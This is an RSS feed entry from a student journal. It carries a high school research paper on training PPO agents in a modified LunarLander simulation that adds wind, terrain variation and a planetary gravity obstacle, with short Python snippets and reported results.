<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Computer Science Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/category/engineering/computer-science/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/category/engineering/computer-science/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Sat, 06 Dec 2025 22:25:04 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

 
	<item>
		<title>Enhanced Lunar Lander (Autonomous Spacecraft Landing System with Multi-Environmental Challenges)</title>
		<link>https://exploratiojournal.com/enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges</link>
		
		<dc:creator><![CDATA[Hireshmi Thirumalaivasan]]></dc:creator>
		<pubDate>Sat, 06 Dec 2025 22:25:01 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Engineering]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4623</guid>

					<description><![CDATA[<p>Hireshmi Thirumalaivasan<br />
John P. Stevens High School</p>
<p>The post <a href="https://exploratiojournal.com/enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges/">Enhanced Lunar Lander (Autonomous Spacecraft Landing System with Multi-Environmental Challenges)</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img fetchpriority="high" decoding="async" width="958" height="958" src="https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886.jpg" alt="" class="wp-image-4624 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886.jpg 958w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-300x300.jpg 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-150x150.jpg 150w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-768x768.jpg 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-230x230.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-350x350.jpg 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-480x480.jpg 480w" sizes="(max-width: 958px) 100vw, 958px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Hireshmi Thirumalaivasan<br><strong>Mentor</strong>: Dr. Bilal Sharqi<br><em>John P. Stevens High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>This research presents a complete study of deep reinforcement learning advancements in lunar landing scenarios, developing from a basic PPO implementation to an enhanced multi-feature environment. The impact of wind disturbances, terrain variations, and planetary obstacles on landing performance is systematically introduced and analyzed. Through careful parameter tuning and environmental modifications, I have demonstrated how PPO agents can successfully navigate complex scenarios while maintaining precision landing between designated flags and avoiding celestial obstacles.</p>



<h2 class="wp-block-heading">1. Introduction</h2>



<p>Autonomous spacecraft landing represents one of the most challenging problems in aerospace engineering and artificial intelligence. This study records the evolution from a basic Lunar Lander environment to a sophisticated multi-environmental system that incorporates realistic physical challenges including atmospheric disturbances, varied terrain topography, and gravitational obstacles.</p>



<p>The research methodology presented follows a systematic approach: starting with a baseline PPO implementation achieving consistent performance in standard conditions, then progressively adding complexity through environmental enhancements while maintaining landing precision and safety requirements.</p>



<h2 class="wp-block-heading">2. Baseline Implementation: Standard Lunar Lander with PPO</h2>



<h4 class="wp-block-heading">2.1. Initial System Architecture</h4>



<p>The foundation of the research begins with a robust PPO implementation for the standard LunarLander-v3 environment:</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" width="1024" height="776" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-1024x776.png" alt="" class="wp-image-4625" style="width:571px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-1024x776.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-300x227.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-768x582.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-1000x758.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-230x174.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-350x265.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-480x364.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM.png 1140w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h4 class="wp-block-heading">2.2. Training Infrastructure</h4>



<p>The baseline system incorporates several critical components:</p>



<p>Parallel Environment Training: The implementation utilizes 4 parallel environments to accelerate training and improve sample efficiency:</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" width="1024" height="494" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-1024x494.png" alt="" class="wp-image-4626" style="width:640px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-1024x494.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-300x145.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-768x370.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-1000x482.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-230x111.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-350x169.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-480x232.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM.png 1476w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h4 class="wp-block-heading">2.3. Baseline Performance Metrics</h4>



<p>The baseline implementation achieved consistent landing success, demonstrating stable convergence over 1,000,000 training timesteps. The system successfully learned to:</p>



<ul class="wp-block-list">
<li>Navigate to the landing zone between designated flags</li>



<li>Control descent velocity for soft landings</li>



<li>Manage fuel consumption efficiently</li>



<li>Maintain stable flight attitudes</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="808" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-1024x808.png" alt="" class="wp-image-4627" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-1024x808.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-300x237.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-768x606.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-1000x789.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-230x181.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-350x276.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-480x379.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM.png 1268w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">3. Enhanced Environment Architecture</h2>



<h4 class="wp-block-heading">3.1. System Design Philosophy</h4>



<p>The enhanced system transitions from the standard environment to a comprehensive multi-feature framework. The core enhancement lies in the EnhancedLunarLander class, which wraps the base environment while adding sophisticated environmental challenges like Terrain, planet and Wind.<br>Refer Appendix section 13.1</p>



<h4 class="wp-block-heading">3.2. Observation Space Enhancement</h4>



<h5 class="wp-block-heading">3.2.1. Base Observation Space (Planet Disabled)</h5>



<p>The base configuration maintains the original LunarLander-v3 observation dimensions including position (x,y), velocity (vx,vy), angle, angular velocity, and ground contact sensors (left leg, right leg). This provides the fundamental state information for basic landing control without additional environmental complexity.<br># Standard 8-dimensional observation space<br>Refer section 13.2</p>



<h5 class="wp-block-heading">3.2.2. Enhanced Observation Space (Planet Enabled)</h5>



<p>When planet features are enabled, the observation space expands from 8 to 11 dimensions by adding planet relative position (x,y) normalized coordinates and Euclidean distance to planet center. This enhancement provides spatial awareness for gravitational obstacle avoidance and navigation planning around the planetary field.<br># Extended 11-dimensional observation space<br>Refer section 13.3</p>



<h5 class="wp-block-heading">3.2.3. Dynamic Observation Augmentation</h5>



<p>The system dynamically calculates and appends planet-related observations during each timestep, including normalized relative position vector and scalar distance measurement. This real-time augmentation enables the reinforcement learning agent to develop sophisticated spatial reasoning and collision avoidance strategies while maintaining computational efficiency through selective feature activation.<br># Runtime observation extension<br>Refer section 13.4</p>



<p>This expansion provides the agent with crucial spatial awareness of planetary obstacles, enabling informed navigation decisions.</p>



<h2 class="wp-block-heading">4. Environmental Challenges Implementation</h2>



<h4 class="wp-block-heading">4.1. Wind Disturbance System</h4>



<p>The enhanced lunar lander system implements a sophisticated three-parameter wind disturbance model comprising wind_strength (physics-based force magnitude), max_wind_speed (visualization parameter), and wind_direction (Brownian motion directional changes) to create realistic atmospheric challenges for reinforcement learning-based autonomous landing control.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="369" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1024x369.png" alt="" class="wp-image-4628" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1024x369.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-300x108.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-768x277.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1536x554.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1000x361.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-230x83.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-350x126.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-480x173.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM.png 1664w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="431" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1024x431.png" alt="" class="wp-image-4629" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1024x431.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-300x126.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-768x323.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1536x646.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1000x421.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-230x97.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-350x147.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-480x202.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM.png 1730w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="771" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1024x771.png" alt="" class="wp-image-4630" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1024x771.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-300x226.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-768x578.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1536x1157.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1000x753.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-230x173.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-350x264.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-480x361.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM.png 1604w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1003" height="1024" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-1003x1024.png" alt="" class="wp-image-4631" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-1003x1024.png 1003w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-294x300.png 294w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-768x784.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-1000x1021.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-230x235.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-350x357.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-480x490.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM.png 1322w" sizes="(max-width: 1003px) 100vw, 1003px" /></figure>



<p><strong>Parameter Independence Discovery</strong></p>



<p><strong>Finding</strong>: max_wind_speed parameter has no impact on learning or performance outcomes&nbsp;</p>



<p><strong>Implication</strong>: Researchers can adjust visualization ranges without affecting experimental validity</p>



<p><strong>Optimal Wind Strength Identification</strong></p>



<p><strong>Finding</strong>: wind_strength = 0.2 provides superior training outcomes compared to 0.1, wind_strength = 0.3 prevents the Lander from landing correctly between flags as shown above.</p>



<p><strong>Hypothesis</strong>: Moderate disturbance forces may enhance policy robustness through improved exploration</p>



<p>This comparative analysis demonstrates that wind_strength is the critical parameter for atmospheric disturbance research, while <strong>max_wind_speed</strong> serves purely visualization purposes without affecting learning outcomes or policy performance.</p>



<ul class="wp-block-list">
<li>Wind Direction = 1 Landing Performance</li>



<li><strong>Landing Failure Confirmation</strong>: With self.wind_direction = 1 (57.3° northeast), the lunar lander failed to achieve consistent precision landing between flags, contradicting previous theoretical predictions of direction independence and revealing a critical gap between training performance metrics (259.78 mean reward) and actual landing execution under specific diagonal wind conditions.</li>



<li><strong>Hypothesis Validation Failure</strong>: The systematic testing assumption that Brownian motion (σ=0.1/timestep) would rapidly neutralize initial directional bias proved insufficient for the specific northeast wind vector, suggesting that certain directional combinations of wind_strength=0.2 and wind_direction=1 create persistent drift patterns that exceed the policy&#8217;s learned compensation capabilities during the critical final descent phase.</li>
</ul>



<p><strong><span style="text-decoration: underline;">Wind Force Components with Current Settings:</span></strong></p>



<ul class="wp-block-list">
<li>Horizontal Force: wind_x = 0.2 × cos(1) = +0.108 (eastward drift)</li>



<li>Vertical Force: wind_y = 0.2 × sin(1) = +0.168 (upward force)</li>



<li>Net Effect: Continuous northeast wind pushing lander away from center</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="342" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-1024x342.png" alt="" class="wp-image-4670" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-1024x342.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-300x100.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-768x257.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-1000x334.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-230x77.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-350x117.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-480x161.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM.png 1274w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Changing Wind Direction =0 , Landar was able to land correctly between flags as per previous Run 3 mentioned above</p>



<p><strong>Wind Adaptation:</strong> The enhanced agent demonstrates sophisticated compensation strategies:</p>



<ul class="wp-block-list">
<li>Real-time thrust vectoring to counteract wind forces</li>



<li>Predictive adjustments based on wind pattern recognition</li>



<li>Maintained landing precision despite continuous atmospheric disturbances</li>
</ul>



<p>The wind system introduces dynamic atmospheric conditions that affect lander trajectory:</p>



<p>def _get_wind_effect(self):</p>



<p>&nbsp; &nbsp; if not self.enable_wind:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; return np.zeros(2)</p>



<p>&nbsp; &nbsp; self.wind_direction += np.random.normal(0, 0.1)&nbsp; # Wind direction variation</p>



<p>&nbsp; &nbsp; wind_x = self.wind_strength * np.cos(self.wind_direction)</p>



<p>&nbsp; &nbsp; wind_y = self.wind_strength * np.sin(self.wind_direction)</p>



<p>&nbsp; &nbsp; return np.array([wind_x, wind_y])</p>



<p><strong>Key Features:</strong></p>



<ul class="wp-block-list">
<li>Dynamic Direction: Wind direction changes stochastically during flight</li>



<li>Controlled Magnitude: Wind strength parameter (0.2) provides challenging but manageable disturbances</li>



<li>Continuous Application: Forces applied to velocity components at each timestep</li>
</ul>



<p>Impact on Training: Wind effects require the agent to develop robust control policies that can compensate for external forces while maintaining trajectory precision.</p>



<h4 class="wp-block-heading">4.2 Terrain Variation System</h4>



<p>The Enhanced LunarLander environment implements a comprehensive terrain modification system designed to simulate diverse lunar surface conditions encountered in real-world autonomous spacecraft landing scenarios. This terrain system provides controlled experimental conditions for evaluating reinforcement learning policy robustness across varying surface complexities, enabling systematic analysis of landing performance under different geological conditions. The different terrain types are implemented in the code below.</p>



<p><strong>Terrain Types</strong>:</p>



<ul class="wp-block-list">
<li>Flat: Baseline terrain for standard operations</li>



<li>Rocky: Variable surface heights requiring adaptive landing approaches</li>



<li>Crater: Depressed landing zones testing precision control</li>
</ul>



<p><strong>Detailed Terrain Type Specifications</strong></p>



<ol class="wp-block-list">
<li><strong>Flat Terrain (terrain_type=&#8217;flat&#8217;)</strong></li>
</ol>



<p><strong>Technical Characteristics:</strong></p>



<ul class="wp-block-list">
<li>Modification: No changes applied to observation vector</li>



<li>Ground Sensors: Maintains original LunarLander-v3 contact detection</li>



<li>Reward Multiplier: 1.0x (baseline scaling)</li>



<li>Surface Variation: Zero artificial perturbations</li>
</ul>



<p><strong>Research Application:</strong></p>



<ul class="wp-block-list">
<li>Baseline Control: Provides experimental control condition</li>



<li>Parameter Isolation: Enables pure wind effect analysis</li>



<li>Performance Baseline: Establishes reference performance metrics</li>



<li>Mission Simulation: Represents prepared landing sites with minimal surface variation</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="354" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-1024x354.png" alt="" class="wp-image-4671" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-1024x354.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-300x104.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-768x266.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-1000x346.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-230x80.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-350x121.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-480x166.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM.png 1306w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>2. <strong>Rocky Terrain (terrain_type=&#8217;rocky&#8217;)</strong></p>



<ol class="wp-block-list"></ol>



<p><strong>Technical Characteristics:</strong></p>



<p>observation[6:8] += np.random.uniform(-0.2, 0.2, 2)</p>



<ul class="wp-block-list">
<li>Surface Variation: Random height perturbations ±0.2 units</li>



<li>Stochastic Nature: Different terrain profile each timestep</li>



<li>Contact Sensors: Both left and right leg sensors affected</li>



<li>Reward Multiplier: 1.5x (increased difficulty compensation)</li>
</ul>



<p><strong>Physical Simulation:</strong></p>



<ul class="wp-block-list">
<li>Surface Roughness: Simulates boulder fields and irregular lunar regolith</li>



<li>Landing Challenge: Requires adaptive leg positioning and balance control</li>



<li>Realistic Conditions: Represents natural lunar surface with minimal preparation</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="333" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-1024x333.png" alt="" class="wp-image-4672" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-1024x333.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-300x98.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-768x250.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-1000x326.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-230x75.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-350x114.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-480x156.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM.png 1296w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p><strong>3. Crater Terrain (terrain_type=&#8217;crater&#8217;)</strong></p>



<p><strong>Technical Characteristics:</strong></p>



<p>observation[6:8] -= 0.3</p>



<ul class="wp-block-list">
<li>Consistent Depression: Fixed -0.3 unit offset for both contact sensors</li>



<li>Deterministic Effect: Predictable crater-like landing zone</li>



<li>Surface Geometry: Simulates landing in depression or crater rim</li>



<li>Reward Multiplier: 1.5x (difficulty compensation)</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="319" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-1024x319.png" alt="" class="wp-image-4673" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-1024x319.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-300x93.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-768x239.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-1000x312.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-230x72.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-350x109.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-480x150.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM.png 1290w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p><strong>Terrain Complexity Hierarchy</strong></p>



<p># Expected difficulty ranking (hypothesis):</p>



<p>terrain_type=&#8217;flat&#8217;: &nbsp; Easiest (100% success rate achieved)</p>



<p>terrain_type=&#8217;rocky&#8217;:&nbsp; Moderate (estimated 80-90% success rate)</p>



<p>terrain_type=&#8217;crater&#8217;: Challenging (estimated 70-85% success rate)</p>



<p>This terrain system provides a comprehensive framework for evaluating autonomous lunar landing system performance across realistic surface conditions, supporting both fundamental research in reinforcement learning robustness and practical mission preparation for diverse lunar exploration scenarios.</p>



<p>Three distinct terrain types challenge different aspects of landing performance:</p>



<p>def _modify_terrain(self, observation):</p>



<p>&nbsp; &nbsp; if self.terrain_type == &#8216;rocky&#8217;:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; # Add random terrain heights</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; observation[6:8] += np.random.uniform(-0.2, 0.2, 2)</p>



<p>&nbsp; &nbsp; elif self.terrain_type == &#8216;crater&#8217;:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; # Create a crater effect</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; observation[6:8] -= 0.3</p>



<p>&nbsp; &nbsp; return observation</p>



<h4 class="wp-block-heading">4.3 Planetary Obstacle System</h4>



<p><br>planet_gravity parameter controls the magnitude of gravitational attraction between the lunar lander and planetary obstacle using inverse square law physics (force = planet_gravity / distance²).</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="777" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-1024x777.png" alt="" class="wp-image-4675" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-1024x777.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-300x228.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-768x583.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-1000x759.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-230x174.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-350x265.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-480x364.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM.png 1342w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>The most sophisticated enhancement introduces a gravitational obstacle requiring navigation planning.</p>



<p>The transition from weak (0.15) to strong (0.5) planet gravity provides definitive assessment of autonomous landing system capabilities under maximum environmental stress, with results directly applicable to mission planning for challenging spacecraft landing scenarios requiring navigation around significant gravitational obstacles.</p>



<p>Critical Design Elements:</p>



<ul class="wp-block-list">
<li>Strategic Positioning: Planet located at coordinates (400, 100) between landing flags</li>



<li>Safety Margins: Minimum distance enforcement prevents catastrophic approaches</li>



<li>Complex Dynamics: Rotational force component adds navigation complexity</li>



<li>Severe Penalties: -3000 reward for collision/bypass events</li>
</ul>



<h2 class="wp-block-heading">5. Parameter Optimization and Training Enhancements</h2>



<h4 class="wp-block-heading">5.1 Advanced Training Configuration</h4>



